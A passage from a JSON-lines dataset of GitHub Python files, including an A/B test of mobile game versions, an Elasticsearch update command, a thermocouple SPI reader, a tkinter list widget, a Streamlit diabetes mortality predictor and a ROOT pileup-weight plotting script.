print(dataframe.describe([0, 0.05, 0.50, 0.95, 0.99, 1]).T)\n\ncheck_df(df)\n\n# Outlier Check\n\ndef outlier_thresholds(dataframe, col_name, q1=0.25, q3=0.75):\n quartile1 = dataframe[col_name].quantile(q1)\n quartile3 = dataframe[col_name].quantile(q3)\n interquantile_range = quartile3 - quartile1\n up_limit = quartile3 + 1.5 * interquantile_range\n low_limit = quartile1 - 1.5 * interquantile_range\n return low_limit, up_limit\n\ndef check_outlier(dataframe, col_name):\n low_limit, up_limit = outlier_thresholds(dataframe, col_name)\n if dataframe[(dataframe[col_name] > up_limit) | (dataframe[col_name] < low_limit)].any(axis=None):\n return True\n else:\n return False\n\ndef replace_with_thresholds(dataframe, variable, q1=0.25, q3=0.75):\n low_limit, up_limit = outlier_thresholds(dataframe, variable, q1=0.25, q3=0.75)\n dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\n dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\n\n\noutlier_thresholds(df,\"sum_gamerounds\")\ncheck_outlier(df,\"sum_gamerounds\")\nreplace_with_thresholds(df,\"sum_gamerounds\")\ncheck_outlier(df,\"sum_gamerounds\")\n\n# HYPOTHESIS\n\n\"\"\" \nHO : M1 = M2 : There is no a statistically difference between A Version and B Version\nH1 : M1 != M2 : There is a statistically difference between A Version and B Version) \n\"\"\"\n\n# Let's take a look at the averages of version usage.\n\ndf.groupby(\"version\").agg({\"sum_gamerounds\": \"mean\"})\n\n# AB Testing (Independent Two-Sample T-Test)\n\n# After checking the normality assumption and variance homogeneity,\n# we will decide to apply a parametric or non-parametric test.\n\n############################\n# Normality Assumption\n############################\n\n# H0: Normal distribution assumption is provided.\n# H1: The assumption of normal distribution is not provided.\n\ntest_stat, pvalue = shapiro(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"])\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 0.7756, p-value = 0.0000\n\ntest_stat, pvalue = shapiro(df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 0.7732, p-value = 0.0000\n\n\"We reject H0 because p-value < 0.005.\"\n\n############################\n# Assumption of Variance Homogeneity\n############################\n# Actually, in this instance we do not need to check the homogeneity of variance.\n# Because the assumption of normality was rejected.\n# In this case automatically we should use non-parametric method.\n\n# H0: Variances are Homogeneous\n# H1: Variances Are Not Homogeneous\n\ntest_stat, pvalue = levene(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 0.8786, p-value = 0.3486\n\n\"We cannot reject H0,Variances are Homogeneous but we must use non-parametric way.\"\n\n############################\n# Mann Whitney U Test\n############################\n\ntest_stat, pvalue = mannwhitneyu(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])\n\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\n\n# Test Stat = 1024214124.5000, p-value = 0.0537\n\n\"We cannot reject H0,There is no a statistically difference between A Version and B Version \"\n\n\n# Functionalization A/B Test\n\ndef AB_Test(df, pthres=0.05):\n # H0: There is no statistical difference between the gate_30 and the gate_40.\n\n print(df.groupby('version').agg({\"sum_gamerounds\": [\"count\", \"mean\"]}))\n\n print(\"NORMAL DISTRIBUTION ASSUMPTION\".center(70, \"*\"))\n\n # H0 : The compared groups have a normal distribution\n\n pvalue_gate_30 = shapiro([df[\"version\"] == \"gate_30\"])[1]\n pvalue_gate_40 = shapiro([df[\"version\"] == \"gate_40\"])[1]\n\n print('p-value_gate30 = %.5f' % (pvalue_gate_30))\n print('p-value_gate40 = %.5f' % (pvalue_gate_40))\n\n if (pvalue_gate_30 < pthres) & (pvalue_gate_40 < pthres):\n print(\"Normality H0 is rejected.\\n\\n\")\n else:\n print(\"Normality H0 is not rejected.\\n\")\n\n print(\"VARIANCE HOMOGENEOUS ASSUMPTION \".center(70, \"*\"))\n\n # H0 : The variance of compared groups is homegenous.\n\n p_value_levene = levene(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])[1]\n\n print('p_value_levene = %.5f' % p_value_levene)\n\n if p_value_levene < pthres:\n print(\"Variance Homogeneity H0 is rejected.\\n\")\n else:\n print(\"Variance Homogeneity H0 is not rejected.\\n\")\n\n if ((pvalue_gate_30 > pthres) & (pvalue_gate_40 > pthres)) & (p_value_levene > pthres):\n p_value_ttest = ttest_ind(df.loc[df[\"version\"] == \"gate_30\"],\n df.loc[df[\"version\"] == \"gate_40\"],\n equal_var=True)[1]\n\n print('p_value_ttest = %.5f' % p_value_ttest)\n\n elif ((pvalue_gate_30 > pthres) & (pvalue_gate_40 > pthres)) & (p_value_levene < pthres):\n p_value_ttest = ttest_ind(df.loc[df[\"version\"] == \"gate_30\"],\n df.loc[df[\"version\"] == \"gate_40\"],\n equal_var=False)[1]\n\n print('p_value_ttest = %.5f' % p_value_ttest)\n else:\n print(\"Non-Parametric test should be done.\\n\\n\")\n pvalue = mannwhitneyu(df.loc[df[\"version\"] == \"gate_30\", \"sum_gamerounds\"],\n df.loc[df[\"version\"] == \"gate_40\", \"sum_gamerounds\"])[1]\n\n print('p_value = %.5f' % pvalue)\n\n print(\" RESULT \".center(70, \"*\"))\n\n if pvalue < pthres:\n print(\n f\"p-value {round(pvalue, 5)} < 0.05 H0 Hypothesis is Rejected. That is, there is a statistically significant difference between them.\")\n\n else:\n print(\n f\"p-value > {pthres} H0 is Not Rejected, That is, there is no statistically significant difference between them. The difference was made by chance.\")\n\n\nAB_Test(df, 0.05)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"HakanGnes/Mobil-Gaming-AB-Test","sub_path":"Mobil Gaming AB test.py","file_name":"Mobil Gaming AB test.py","file_ext":"py","file_size_in_byte":8691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73674262314","text":"from django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search, Q\nfrom ...utils import get_registration_status_color\nimport traceback\n\n\nclass Command(BaseCommand):\n help = 'Sets registration_status_color for ES records'\n\n def handle(self, *args, **options):\n # Инициализация клиента ElasticSearch\n es = Elasticsearch(settings.ELASTIC_HOST, timeout=settings.ELASTIC_TIMEOUT)\n query = Q(\n \"match\",\n search_data__obj_state=2,\n ) & ~Q(\n 'query_string',\n query=\"_exists_:search_data.registration_status_color\"\n )\n s = Search().using(es).query(query)\n for h in s.scan():\n body = h.to_dict()\n try:\n body['search_data']['registration_status_color'] = get_registration_status_color(body)\n except:\n self.stdout.write(self.style.ERROR(f\"Error in {h.meta.id}\"))\n error_traceback = traceback.format_exc()\n self.stdout.write(error_traceback)\n es.index(index=settings.ELASTIC_INDEX_NAME,\n doc_type='_doc',\n id=h.meta.id,\n body=body,\n request_timeout=30)\n self.stdout.write(self.style.SUCCESS('Finished'))\n","repo_name":"alexmon1989/uma","sub_path":"apps/search/management/commands/set_registration_status_color.py","file_name":"set_registration_status_color.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1926515261","text":"# _*_ coding:utf-8 _*_\n\nfrom time import sleep\nimport spidev\nspi = spidev.SpiDev()\n\nspi.open(0,0)\t\t\t#/sys/bus/spi/devices/dev0.0を使う\nspi.mode = 0x03\t\t\t#モード3 CPOL:1 CPHA:1 cpha must be 1\nspi.max_speed_hz = 1000000\t#最大クロック周波数\n\nresp = spi.xfer([0x81,0x03])\t#K熱電対を選択\nresp = spi.xfer([0x80,0xC1])\t#計測\nsleep(0.1)\t\t\t#計測を待つ\n\nprint(\"全レジスタの値\")\nprint(\"アドレス 値\");\nresp = spi.readbytes(17)\nfor i in range(1,len(resp)):\n\tprint(\"{0:02X}h {1:02X}h\".format(i-1,resp[i]))\n\ndummy = 0\nresp = spi.xfer2([0x0C,0x0D,0x0E,dummy])\t#熱電対の温度を読み込み\nvalue = resp[1] * 256 + resp[2]\nif (resp[1] & 0x80) != 0:\n\tvalue = -1 * (~(value - 1) & 0x7FFF)\t#2の補数の10進数化\nprint(\"熱電対温度 :{}℃\".format(value*0.0625))\n\nresp = spi.xfer2([0x0A,0x0B,dummy])\t\t#冷接点の温度を読み込み\nvalue = (resp[1] << 6) + (resp[2] >> 2)\nif (resp[1] & 0x80) != 0:\n\tvalue = -1 * (~(value - 1) & 0x7FFF)\t#2の補数の10進数化\nprint(\"冷接点温度 :{}℃\".format(value*0.015625))\n\nspi.close()\n","repo_name":"garameki/spi","sub_path":"testMax31856_with_K.py","file_name":"testMax31856_with_K.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6719506329","text":"from PIL import Image, ImageTk\nfrom os import listdir\nfrom os.path import isfile, join\nimport math\nfrom CommonFunctions import resize_image_by_height\n\n\nclass ClickableList:\n def __init__(self, x, y, w, h, canvas, parent):\n self.parent = parent\n self.x = x\n self.y = y\n img_prev = Image.open('obrazky/prev.png')\n img_prev = resize_image_by_height(img_prev, 40)\n img_next = Image.open('obrazky/next.png')\n img_next = resize_image_by_height(img_next, 40)\n self.prev_arrow = ImageTk.PhotoImage(img_prev)\n self.next_arrow = ImageTk.PhotoImage(img_next)\n self.height = h\n self.width = w\n self.buttons = []\n self.canvas = canvas\n self.parent.solve_screen_keyboard.hide()\n self.line_h = 60\n self.item_h = 45\n self.bottom_pad = 40\n self.top_pad = 40\n self.shift = int(self.width / 15)\n self.col_width = int(w/2)\n self.on_one_page = math.floor((self.height - self.bottom_pad - self.top_pad) / self.line_h) * 2\n self.current_page = 0\n self.pages = []\n self.load_buttons()\n self.draw_page_buttons()\n\n self.selected = None\n self.draw()\n\n def remove(self):\n self.remove_current_page()\n self.canvas.delete(self.prev_arrow_obj)\n self.canvas.delete(self.next_arrow_obj)\n\n def load_buttons(self):\n x = self.x + self.width / 2.1 + self.shift\n y = self.y + self.top_pad\n mypath = \"sady_uloh\"\n all_files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n for button in all_files:\n self.buttons.append(ListButton(x - self.col_width/2, y, int((self.width/2) - 100),\n self.item_h, button.split(\".\")[0], self.canvas, self.shift, self))\n y += self.line_h\n\n i = 0\n while i < len(self.buttons):\n self.pages.append((i, i + self.on_one_page - 1))\n i += self.on_one_page\n\n def deselect_all(self):\n for button in self.buttons:\n if button.selected == True:\n button.leave(None)\n\n def draw_page_buttons(self):\n x = self.x + self.width / 2\n y = self.y + self.height - 40\n self.prev_arrow_obj = self.canvas.create_image(x - self.bottom_pad, y, image=self.prev_arrow, anchor=\"c\")\n self.next_arrow_obj = self.canvas.create_image(x + self.bottom_pad, y, image=self.next_arrow, anchor=\"c\")\n self.canvas.tag_bind(self.prev_arrow_obj, '', self.prev_page)\n self.canvas.tag_bind(self.next_arrow_obj, '', self.next_page)\n\n def generate_colors(self):\n return [\"red2\", \"orange\", \"yellow2\", \"green2\", \"blue\", \"violet\"]\n\n def draw(self):\n y = self.y + self.top_pad\n middle = False\n start_i = self.pages[self.current_page][0]\n end_i = self.pages[self.current_page][1]\n middle_i = (self.current_page * self.on_one_page) + int(self.on_one_page/2)\n\n colors = self.generate_colors()\n for i in range(len(self.buttons)):\n if i >= start_i and i <= end_i and i < middle_i:\n # lava strana\n self.buttons[i].y = y\n self.buttons[i].change_color(colors.pop(0))\n self.buttons[i].draw()\n y += self.line_h\n\n elif i >= middle_i and i <= end_i:\n # prava strana\n if not middle:\n middle = True\n y = self.y + self.top_pad\n colors = self.generate_colors()\n self.buttons[i].y = y\n self.buttons[i].shifted = True\n self.buttons[i].change_color(colors.pop(0))\n self.buttons[i].draw()\n y += self.line_h\n\n def next_page(self, _):\n self.remove_current_page()\n self.current_page += 1\n if self.current_page > len(self.pages) - 1:\n self.current_page = 0\n self.draw()\n\n def prev_page(self, _):\n self.remove_current_page()\n self.current_page -= 1\n if self.current_page < 0:\n self.current_page = len(self.pages) - 1\n self.draw()\n\n def remove_current_page(self):\n start_i = self.pages[self.current_page][0]\n end_i = self.pages[self.current_page][1]\n for i in range(len(self.buttons)):\n if i >= start_i and i <= end_i:\n self.buttons[i].remove()\n\n\nclass ListButton:\n def __init__(self, x, y, w, h, text, canvas, fold_img_h, list):\n self.x = x\n self.y = y\n self.text = text\n self.canvas = canvas\n self.folder_img_h = fold_img_h\n self.width = w\n self.height = h\n self.is_selected = False\n self.list = list\n self.outline_id = 0\n self.shifted = False\n self.alt_x = self.x + self.width + 58 + 30\n self.color = \"green3\"\n self.selected = False\n self.text_color = 'white' if self.color in ('violet', 'red', 'blue', 'green3', 'green4') else '#0a333f'\n self.load_images()\n\n def get_upper_corner(self):\n return self.x - self.width / 2, self.y - self.height / 2\n\n def get_lower_corner(self):\n return self.x + self.width / 2, self.y + self.height / 2\n\n def remove(self):\n self.canvas.delete(self.textObj)\n self.canvas.delete(self.imageObj)\n self.canvas.delete(self.outline_id)\n self.canvas.delete(self.folderObj)\n self.canvas.delete(self.hoveredObj)\n\n def click(self, _):\n self.list.parent.solve_screen_keyboard.show()\n self.list.remove()\n self.list.parent.draw_task_assignment(self.text)\n\n def choose_text_color(self):\n if self.color in ('violet', 'red', 'blue', 'green3', 'green4', \"red2\"):\n self.text_color = \"white\"\n else:\n self.text_color = '#0a333f'\n\n def change_color(self, color):\n self.color = color\n self.choose_text_color()\n self.load_images()\n\n def load_images(self):\n img = Image.open('obrazky/buttons/{}.png'.format(self.color))\n img = img.resize((self.width, self.height), Image.ANTIALIAS)\n img3 = Image.open('obrazky/buttons/green.png')\n img3 = img3.resize((self.width, self.height), Image.ANTIALIAS)\n img2 = Image.open('obrazky/folder_icon.png')\n img2 = img2.resize((self.height + 10, self.height), Image.ANTIALIAS)\n\n self.image = ImageTk.PhotoImage(img)\n self.folder_img = ImageTk.PhotoImage(img2)\n self.hovered_img = ImageTk.PhotoImage(img3)\n\n def enter(self, _):\n self.list.deselect_all()\n self.canvas.itemconfigure(self.imageObj, state=\"hidden\")\n self.canvas.itemconfigure(self.hoveredObj, state='normal')\n self.canvas.itemconfigure(self.textObj, fill='#0a333f')\n self.selected = True\n\n def leave(self, _):\n self.selected = False\n self.canvas.itemconfigure(self.hoveredObj, state='hidden')\n self.canvas.itemconfigure(self.imageObj, state=\"normal\")\n self.canvas.itemconfigure(self.textObj, fill=self.text_color)\n\n def draw(self):\n fih = self.folder_img_h\n x = self.x\n if self.shifted:\n x = self.alt_x\n\n self.hoveredObj = self.canvas.create_image(x, self.y, image=self.hovered_img, anchor=\"c\")\n self.imageObj = self.canvas.create_image(x, self.y, image=self.image, anchor=\"c\")\n self.folderObj = self.canvas.create_image(x - self.width / 2.2- fih, self.y, image=self.folder_img,\n anchor=\"c\")\n self.textObj = self.canvas.create_text(x, self.y, font=(\"Comic Sans MS\", 15), fill=self.text_color, text=self.text.replace(\"_\",\" \"),\n anchor=\"c\")\n\n self.canvas.tag_bind(self.folderObj, '', self.click)\n self.canvas.tag_bind(self.hoveredObj, '', self.click)\n self.canvas.tag_bind(self.textObj, '', self.click)\n\n self.canvas.tag_bind(self.imageObj, '', self.enter)\n self.canvas.tag_bind(self.textObj, '', self.enter)\n self.canvas.tag_bind(self.hoveredObj, '', self.leave)\n self.canvas.tag_bind(self.textObj, '', self.leave)\n","repo_name":"Kothy/Collector","sub_path":"ClickableList.py","file_name":"ClickableList.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73747130473","text":"# streamlit test, version1\n\nimport pandas as pd\nimport numpy as np\nfrom pickle import load\nimport streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom xgboost import XGBClassifier\nfrom matplotlib import pyplot as plt\nfrom numpy import sqrt\nfrom numpy import argmax\nimport joblib\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import roc_auc_score\nimport sklearn.metrics as metrics\nfrom sklearn.metrics import plot_roc_curve\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils import resample\nfrom pickle import load\nimport shap\n\n# loading in the model to predict on the data\n## xgb models\nscaler, model, expl = joblib.load('sme.pkl')\n\n## im non\nim_sur = Image.open('alive.jpg')\n## im pro\nim_die = Image.open('die.jpg')\n\n# custom def : shap\ndef shap(\n sample_case,\n scaler = scaler,\n explainer = expl\n):\n # standardization columns\n std_cols=['age','duration','hptd'] \n # feature extraction from input data UA \n sample_case_features = sample_case.loc[:,['duration', 'vac_janssen', 'Metformin', 'Pioglitazone', 'hptd', 'hptv', 'Sitagliptin', 'male', 'age', 'recoverd_N']]\n sample_case_features[std_cols] = scaler.transform(sample_case_features[std_cols])\n expl_test = explainer.shap_values(sample_case_features.iloc[0])\n shap_bar = pd.DataFrame(\n {'shap_value(probability)' : expl_test}, index = ['duration', 'vac_janssen', 'Metformin', 'Pioglitazone', 'hptd', 'hptv', 'Sitagliptin', 'male', 'age', 'recoverd_N'])\n # clrs = ['blue' if x < 0 else 'red' for x in shap_var['shap']]\n return shap_bar\n\n# custom def : standardization and prediction\ndef model_prediction(\n sample_case,\n scaler = scaler, \n model = model\n):\n \"\"\"\n 'recoverd_N'\n 'age'\n 'male'\n 'duration'\n 'vac_janssen'\n 'hptv'\n 'Metformin'\n 'hptd'\n 'Pioglitazone'\n 'Sitagliptin'\n \"\"\"\n \n # standardization columns\n std_cols=['age','duration','hptd'] \n # feature extraction from input data UA \n sample_case_features = sample_case.loc[:,['duration', 'vac_janssen', 'Metformin', 'Pioglitazone', 'hptd', 'hptv', 'Sitagliptin', 'male', 'age', 'recoverd_N']]\n sample_case_features[std_cols] = scaler.transform(sample_case_features[std_cols])\n \n # predict probability by model\n prob = model.predict_proba(sample_case_features)[:,1]\n \n return prob\n\ndef data_mapping(df):\n \"\"\"this function preprocess the user input\n return type: pandas dataframe\n \"\"\"\n df.male = df.male.map({'female':0, 'male':1})\n df.recoverd_N = df.recoverd_N.map({'Yes':0, 'No':1})\n df.vac_janssen = df.vac_janssen.map({'No':0, 'Yes':1})\n df.hptv = df.hptv.map({'No':0, 'Yes':1})\n df.Metformin = df.Metformin.map({'No':0, 'Yes':1})\n df.Pioglitazone = df.Pioglitazone.map({'No':0, 'Yes':1})\n df.Sitagliptin = df.Sitagliptin.map({'No':0, 'Yes':1})\n\n #df.he_ubld = df.he_ubld.map({\"-\":0, \"+/-\":1, \"1+\":2, \"2+\":3, \"3+\":4, \"4+\":5})\n #df.he_upro = df.he_upro.map({\"-\":0, \"+/-\":1, \"1+\":2, \"2+\":3, \"3+\":4, \"4+\":5})\n #df.he_uglu = df.he_uglu.map({\"-\":0, \"+/-\":1, \"1+\":2, \"2+\":3, \"3+\":4, \"4+\":5})\n return df\n\ndef main():\n # giving the webpage a title\n st.title(\"Will you be alive?\")\n \n # here we define some of the front end elements of the web page like \n # the font and background color, the padding and the text to be displayed\n html_temp = \"\"\"\n
    \n

    Prediction Death in diabetes ML App

    \n
    \n \"\"\"\n \n # this line allows us to display the front end aspects we have \n # defined in the above code\n st.markdown(html_temp, unsafe_allow_html = True)\n \n # the following lines create text boxes in which the user can enter \n # the data required to make the prediction\n\n age = st.sidebar.slider(\"age\", 0, 100, 1)\n male = st.sidebar.selectbox(\"sex\", (\"female\", \"male\"))\n vac_janssen = st.sidebar.selectbox(\"Have you vaccinated Janssen?\", (\"Yes\", \"No\"))\n recoverd_N = st.sidebar.selectbox(\"have you recovered?\", (\"Yes\", \"No\"))\n duration = st.sidebar.slider(\"How long have you been vaccinated?\", 0, 365, 1)\n hptv = st.sidebar.selectbox(\"Have you ever been to a hospital?\", (\"Yes\", \"No\"))\n hptd = st.sidebar.slider(\"How long have you been in the hospital? (day)\", 0, 110, 1)\n Metformin = st.sidebar.selectbox(\"Do you take metformin?\", (\"Yes\", \"No\"))\n Pioglitazone = st.sidebar.selectbox(\"Do you take Pioglitazone?\", (\"Yes\", \"No\"))\n Sitagliptin = st.sidebar.selectbox(\"Do you take Sitagliptin?\", (\"Yes\", \"No\"))\n \n features = {\n \"duration\" : duration,\n \"vac_janssen\" : vac_janssen,\n \"Metformin\" : Metformin,\n \"Pioglitazone\": Pioglitazone,\n \"hptd\" : hptd,\n \"hptv\" : hptv,\n \"Sitagliptin\" : Sitagliptin,\n \"male\" : male,\n \"age\" : age,\n \"recoverd_N\" : recoverd_N\n }\n sample_case = pd.DataFrame(features, index=[0])\n \n result = \"\"\n prob = 0.0\n # the below line ensures that when the button called 'Predict' is clicked, \n # the prediction function defined above is called to make the prediction \n # and store it in the variable result\n if st.button(\"Predict\"):\n sample_case_map = data_mapping(sample_case)\n result = model_prediction(sample_case_map)\n prob = result\n shap_bar = shap(sample_case_map)\n\n st.success('probability : {}'.format(result))\n \n if float(prob) < 0.432 :\n st.success(\"threshold : 0.432\")\n st.image(im_sur)\n st.bar_chart(data=shap_bar)\n else :\n st.success(\"threshold : 0.432\")\n st.image(im_die)\n st.bar_chart(data=shap_bar)\n \nif __name__=='__main__':\n main()\n","repo_name":"eunchanj/streamlit_adr_death","sub_path":"streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28269914001","text":"\"\"\"added userinfo, find definition statistic\n\nRevision ID: 165feca318ad\nRevises: 122feefadc11\nCreate Date: 2023-08-02 08:31:08.481258\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '165feca318ad'\ndown_revision = '122feefadc11'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('user_info', 'language',\n existing_type=sa.VARCHAR(),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('user_info', 'language',\n existing_type=sa.VARCHAR(),\n nullable=False)\n # ### end Alembic commands ###\n","repo_name":"AlertRED/telegram-language-bot","sub_path":"database/migration/versions/165feca318ad.py","file_name":"165feca318ad.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"146598836","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n#题目:从键盘输入一些字符,逐个把它们写到磁盘文件上,直到输入一个 # 为止。\n\nfp = open('test.txt','a+') #a+ 表示可追加并读写\n\nwhile True:\n\ts = input('请输入字符:')\n\tif s != '#':\n\t\tfp.write(s)\n\n\telse:\n\t\tbreak\n\nfp.seek(0)\nprint(fp.read())\n\nall_the_text = open('test.txt').read()\nprint (all_the_text)\n\nfp.close()\n\n\n\n\n\n\n\n\n\n","repo_name":"chenyanqa/example_tests_one","sub_path":"test_97.py","file_name":"test_97.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"913178894","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, division\n\nimport ROOT, os, sys, argparse, stealthEnv, subprocess\ninputArgumentsParser = argparse.ArgumentParser(description='Extract HLT efficiencies histograms and save them to output image.')\ninputArgumentsParser.add_argument('--outputFolder', default=\"/uscms/home/tmudholk/nobackup/analysisAreas/PUWeights\", help='Path to folder in which to store output files.',type=str)\ninputArguments = inputArgumentsParser.parse_args()\n\nROOT.gROOT.SetBatch(ROOT.kTRUE)\nif not(os.path.isdir(inputArguments.outputFolder)): subprocess.check_call(\"mkdir -p {oF}\".format(oF=inputArguments.outputFolder), shell=True, executable=\"/bin/bash\")\n\nsourceFolder_MC = \"{eP}/{sER}/analysisEOSAreas/analysis/\".format(eP=stealthEnv.EOSPrefix, sER=stealthEnv.stealthEOSRoot)\nsourceFolder_data = \"{sR}/getPUWeights/data/\".format(sR=stealthEnv.stealthRoot)\n\n# targets = {\n# \"signal\": \"hltEfficiency1D_leadingPhoton_signal\",\n# \"signal_loose\": \"hltEfficiency1D_leadingPhoton_signal_loose\",\n# \"control\": \"hltEfficiency1D_leadingPhoton_control_fakefake\"\n# }\n\n# for selection, efficiencyName in targets.items():\n# print(\"Extracting selection: {s}, efficiencyName: {eN}\".format(s=selection, eN=efficiencyName))\n# for year, sourceTypePathDict in sources.items():\n# print(\"Fetching efficiencies for year: {y}\".format(y=year))\n# # outputFile = ROOT.TFile.Open(inputArguments.outputFolder + \"/\" + inputArguments.outputPrefix + \"_\" + selection + \".root\", \"RECREATE\")\n# outputFileName = \"{oF}/{oP}_{s}_{y}.root\".format(oF=inputArguments.outputFolder, oP=inputArguments.outputPrefix, s=selection, y=year)\n# outputFile = ROOT.TFile.Open(outputFileName, \"RECREATE\")\n# if ((outputFile.IsZombie() == ROOT.kTRUE) or not(outputFile.IsOpen() == ROOT.kTRUE)): sys.exit(\"ERROR: Unable to open file \\\"{oFN}\\\"\".format(oFN=outputFileName))\n# for sourceType, path in sourceTypePathDict.items():\n# print(\"Fetching efficiency of type: \\\"{sT}\\\" from path: {p}\".format(sT=sourceType, p=path))\n# inputFile = ROOT.TFile.Open(path, \"READ\")\n# if ((inputFile.IsZombie() == ROOT.kTRUE) or not(inputFile.IsOpen() == ROOT.kTRUE)): sys.exit(\"ERROR: Unable to open file at path \\\"{p}\\\"\".format(p=path))\n# efficiencyToFetch = ROOT.TEfficiency()\n# efficiency_label = (efficiencyName.replace(\"hltEfficiency1D_leadingPhoton_\", \"\")).replace(\"_\" + selection, \"\") + \"_\" + sourceType\n# efficiencyToFetch.SetName(efficiency_label)\n# inputFile.GetObject(efficiencyName, efficiencyToFetch)\n# efficiencyToFetch.SetName(\"hltEfficiency_{s}\".format(s=sourceType))\n# c = ROOT.TCanvas(\"output_\" + efficiency_label + \"_\" + efficiencyName + \"_\" + str(year), \"output_\" + efficiency_label + \"_\" + efficiencyName + \"_\" + str(year), 1024, 768)\n# efficiencyToFetch.Draw()\n# c.SaveAs(\"{oF}/{oP}_{l}_{y}.pdf\".format(oF=inputArguments.outputFolder, oP=inputArguments.outputPrefix, l=efficiency_label, y=year))\n# outputFile.WriteTObject(efficiencyToFetch)\n# inputFile.Close()\n# outputFile.Close()\n\nselection_names = {\n \"signal\": \"signal\",\n \"signal_loose\": \"loose signal\",\n \"control\": \"diphoton control\"\n}\n\nfor year in [\"2016\", \"2017\", \"2018\"]:\n # First data histograms\n source_file_path = \"{sF}/dataPU_{y}.root\".format(sF=sourceFolder_data, y=year)\n inputFileObject = ROOT.TFile.Open(source_file_path, \"READ\")\n if ((inputFileObject.IsZombie() == ROOT.kTRUE) or not(inputFileObject.IsOpen() == ROOT.kTRUE)):\n sys.exit(\"ERROR: Unable to open file {f}\".format(f=source_file_path))\n puDataHistogram = ROOT.TH1D()\n inputFileObject.GetObject(\"pileup\", puDataHistogram)\n puDataHistogram.GetXaxis().SetTitle(\"PU\")\n puDataHistogram.GetYaxis().SetTitle(\"Events/100\")\n puDataHistogram.SetTitle((\"Pileup distribution, data, {y}\").format(y=year))\n outputObjectName = \"pileup_data_{y}\".format(y=year)\n c = ROOT.TCanvas(\"output_\" + outputObjectName, \"output_\" + outputObjectName, 1024, 768)\n puDataHistogram.Draw()\n c.SaveAs(\"{oF}/{n}.pdf\".format(oF=inputArguments.outputFolder, n=outputObjectName))\n inputFileObject.Close()\n # Next \n for production_type in [\"gluino\", \"squark\"]:\n for signal_selection in [\"signal\", \"signal_loose\"]:\n source_file_path = \"{sF}/PUWeights_{y}_{p}_{s}.root\".format(sF=sourceFolder_MC, y=year, p=production_type, s=signal_selection)\n print(\"Extracting plots from file: {s_f_p}\".format(s_f_p=source_file_path))\n inputFileObject = ROOT.TFile.Open(source_file_path, \"READ\")\n if ((inputFileObject.IsZombie() == ROOT.kTRUE) or not(inputFileObject.IsOpen() == ROOT.kTRUE)):\n sys.exit(\"ERROR: Unable to open file {f}\".format(f=source_file_path))\n puWeightsHistogram = ROOT.TH1D()\n inputFileObject.GetObject(\"pileupWeights\", puWeightsHistogram)\n puWeightsHistogram.GetXaxis().SetTitle(\"PU\")\n puWeightsHistogram.GetYaxis().SetTitle(\"weight\")\n puWeightsHistogram.SetTitle((\"PU weights, {y}, {n} selection, di{p} production\").format(y=year, n=selection_names[signal_selection], p=production_type))\n outputObjectName = \"pileup_weights_vs_pu_{y}_{p}_{s}\".format(y=year, p=production_type, s=signal_selection)\n c = ROOT.TCanvas(\"output_\" + outputObjectName, \"output_\" + outputObjectName, 1024, 768)\n puWeightsHistogram.Draw()\n c.SaveAs(\"{oF}/{n}.pdf\".format(oF=inputArguments.outputFolder, n=outputObjectName))\n inputFileObject.Close()\n\nprint(\"All done!\")\n","repo_name":"tanmaymudholkar/STEALTH","sub_path":"miscUtils/extractPUWeights.py","file_name":"extractPUWeights.py","file_ext":"py","file_size_in_byte":5691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"12134747929","text":"t = int(input())\r\n\r\n\r\n# input(),input()\r\ndef code():\r\n n = int(input())\r\n st = [int(i) for i in input().split()]\r\n tups = 